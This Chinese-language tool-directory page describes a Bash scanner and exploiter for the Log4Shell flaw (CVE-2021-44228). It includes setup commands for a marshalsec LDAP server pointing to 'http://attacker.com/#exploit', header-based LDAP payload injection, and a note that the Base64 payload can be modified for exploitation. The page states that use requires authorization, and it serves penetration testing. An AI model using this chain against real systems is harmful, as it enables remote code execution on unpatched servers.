Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4j-Scanner-Exploit — 一个Bash脚本,用于远程识别Log4j漏洞CVE-2021-44228。 | Kitploit
工具/GitHubGitHub/julian911015/log4j-scanner-exploit
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

一个Bash脚本,用于远程识别Log4j漏洞CVE-2021-44228。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell-Scanner-Exploit

用于远程识别和/或利用Log4shell漏洞的bash脚本。 该工具使用LDAP payload以及X-Api-Version、User-Agent和X-Forwarded-For头部进行多项测试。

务必在获得被审计服务/应用程序所有者的授权后使用此脚本。

依赖项:

  1. 从Github创建预配置的LDAP服务器:https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. 启用HTTP服务器 python3 -m http.server 8080

  2. 安装Java #sudo apt install default-jre

  3. 安装Curl #sudo apt-get install curl

使用示例:

输入以下参数:

  • 要扫描的URL列表
  • LDAP服务器IP地址
  • LDAP服务器端口
  • HTTP服务器IP地址
  • HTTP服务器端口

扫描内网应用示例:

  • ./Log4Shell_Scanner.sh <URL字典> <LDAP服务器IP> <LDAP服务器端口> <HTTP服务器IP> <HTTP服务器端口>

image

扫描互联网应用示例:

  • ./Log4Shell_Scanner.sh <URL字典> <LDAP服务器IP> <LDAP服务器端口> <HTTP服务器IP> <HTTP服务器端口>

image

说明:

  • 所使用的payload会向被识别为易受攻击的机器发送一条“ifconfig”命令,该payload已用Base64编码,可在渗透测试审计中修改以执行利用阶段。
  • 若要在互联网服务中使用该工具,可启用Ngrok服务,将其转发到LDAP服务器的本地端口。
  • 务必在获得被审计服务/应用程序所有者的授权后使用此脚本。
下载工具